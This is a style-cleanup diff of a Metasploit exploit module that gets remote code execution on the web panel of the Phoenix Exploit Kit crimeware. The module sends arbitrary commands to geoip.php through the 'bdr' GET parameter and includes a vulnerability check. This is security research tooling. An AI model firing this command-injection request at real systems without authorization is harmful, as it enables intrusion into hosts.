@@ -14,22 +14,22 @@ def initialize(info={})
14
14
super ( update_info ( info ,
15
15
'Name' => 'Phoenix Exploit Kit Remote Code Execution' ,
16
16
'Description' => %q{
17
- This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
17
+ This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
18
18
Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
19
- presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
20
- then silently installs malware.
19
+ presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
20
+ silently installing malware if found .
21
21
} ,
22
22
'License' => MSF_LICENSE ,
23
23
'Author' =>
24
24
[
25
- 'CrashBandicot @DosPerl ' , #initial discovery
26
- 'Jay Turla <@shipcod3>' , #msf module
25
+ 'CrashBandicot' , #initial discovery by @DosPerl
26
+ 'Jay Turla' #msf module by @shipcod3
27
27
] ,
28
28
'References' =>
29
29
[
30
30
[ 'EDB' , '40047' ] ,
31
31
[ 'URL' , 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ] , # description of Phoenix Exploit Kit
32
- [ 'URL' , 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ] ,
32
+ [ 'URL' , 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
33
33
] ,
34
34
'Privileged' => false ,
35
35
'Payload' =>
@@ -45,16 +45,16 @@ def initialize(info={})
45
45
'Arch' => ARCH_CMD ,
46
46
'Targets' =>
47
47
[
48
- [ 'Phoenix Exploit Kit / Unix' , { 'Platform' => 'unix' } ] ,
49
- [ 'Phoenix Exploit Kit / Windows' , { 'Platform' => 'win' } ]
48
+ [ 'Phoenix Exploit Kit / Unix' , { 'Platform' => 'unix' } ] ,
49
+ [ 'Phoenix Exploit Kit / Windows' , { 'Platform' => 'win' } ]
50
50
] ,
51
51
'DisclosureDate' => 'Jul 01 2016' ,
52
52
'DefaultTarget' => 0 ) )
53
53
54
54
register_options (
55
55
[
56
- OptString . new ( 'TARGETURI' , [ true , 'The path of geoip.php which is vulnerable to RCE' , '/Phoenix/includes/geoip.php' ] ) ,
57
- ] , self . class )
56
+ OptString . new ( 'TARGETURI' , [ true , 'The path of geoip.php which is vulnerable to RCE' , '/Phoenix/includes/geoip.php' ] )
57
+ ] , self . class )
58
58
end
59
59
60
60
def check
@@ -63,7 +63,7 @@ def check
63
63
if res && res . body . include? ( test )
64
64
return Exploit ::CheckCode ::Vulnerable
65
65
end
66
- return Exploit ::CheckCode ::Safe
66
+ Exploit ::CheckCode ::Safe
67
67
end
68
68
69
69
def exploit
@@ -72,12 +72,12 @@ def exploit
72
72
end
73
73
74
74
def http_send_command ( cmd )
75
- send_request_cgi ( {
75
+ send_request_cgi (
76
76
'method' => 'GET' ,
77
77
'uri' => normalize_uri ( target_uri . path ) ,
78
78
'vars_get' => {
79
79
'bdr' => cmd
80
80
}
81
- } )
81
+ )
82
82
end
83
83
end
0 commit comments